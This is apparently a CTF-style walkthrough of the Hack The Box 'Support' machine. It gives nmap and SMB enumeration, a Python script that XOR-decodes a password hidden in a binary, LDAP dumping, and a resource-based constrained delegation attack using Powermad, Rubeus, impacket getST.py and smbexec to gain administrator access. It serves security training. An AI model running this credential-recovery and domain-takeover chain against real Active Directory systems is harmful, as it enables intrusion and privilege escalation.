Support

Nmap

# Nmap 7.92 scan initiated Thu Nov 10 09:32:35 2022 as: nmap -sCV -oA support 10.10.11.174
Nmap scan report for 10.10.11.174
Host is up (0.067s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-11-10 16:32:57Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-11-10T16:33:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Nov 10 09:33:44 2022 -- 1 IP address (1 host up) scanned in 68.87 seconds

SMB Enumeration

smbclient -N -L \\\\10.10.11.174

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share
    support-tools   Disk      support staff tools
    SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available

Connection to support-tools. Find intersting userinfo.exe.zip image{:class="img-responsive"} ### Looking at UserInfo.exe UserInfo.exe provides enc_password string that needs to be decoded image{:class="img-responsive"} Python Script to decode enc_password

import base64
# import enc_password & key from userinfo.exe
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO.........."
key = b'armando'
#base64 decode enc_password
array = base64.b64decode(enc_password)
#input key for decode
array2 = ''
for i in range(len(array)):
    array2 += chr(array[i] ^ key[i%len(key)] ^ 223)
#print decoded enc_password
print(array2)
# nvEfEK16^1aM4$e7Ac......RWxPWO1%lmz

Also find LDAP service (also found via nmap scan port 389) image{:class="img-responsive"} ### LDAP HackTricks has lots to learn about LDAP enumeration. Dumps all the ldap domain into files (put in seperate folder). Shows Support has most privledges other than admin. Huge ammount of data to go through.

ldapdomaindump -u 'support\ldap' -p 'nvEfEK16^1aM4$e7Ac......RWxPWO1%lmz' dc.support.htb

Support account has remote access. This should be the account we target. Even if the name of the box gives it away. image{:class="img-responsive"} Support user info looks different then rest of ldapsearch. image{:class="img-responsive"} Video watched to learn about Evil-WINRM Login with support password found from ldap user.txt done! image{:class="img-responsive"} ### PrivEsc Steps After using bloodhound (I didnt take any notes or screenshots, sorry!). We find support has write privlege to the AD object. So we learn more, see think below. Kerberos Resyntaxhighlight-based Constrained Delegation: Computer Object Takeover Server(target) Actions 1. Create new computer object 2. Modify computer's AD Object 3. Generate password

#EVIL-WINRM upload
upload /home/sourmilk/Tools/Powermad/Powermad.ps1 pm.ps1
upload /home/sourmilk/Tools/Ghostpack-CompiledBinaries/Rubeus.exe

Import-Module ./pm.ps1

Set-Variable -Name "SourMilkPC" -Value "Sour01"
Set-Variable -Name "targetComputer" -Value "DC"

New-MachineAccount -MachineAccount (Get-Variable -Name "SourMilkPC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "SourMilkPC").Value + '$')

Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount

Use Rubeus

./r.exe hash /password:123456 /user:Sour01$ /domain:support.htb

Attacker Box

/home/sourmilk/Tools/impacket/examples/getST.py support.htb/Sour01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey DD0056CE2B3F702FC57FE972B603DEEA12F729A58866406130FEFBD069F15004

export KRB5CCNAME=administrator.ccache

smbexec.py support.htb/administrator@dc.support.htb -no-pass -k

And we have root! Sorry no screenshots again. Bad on me.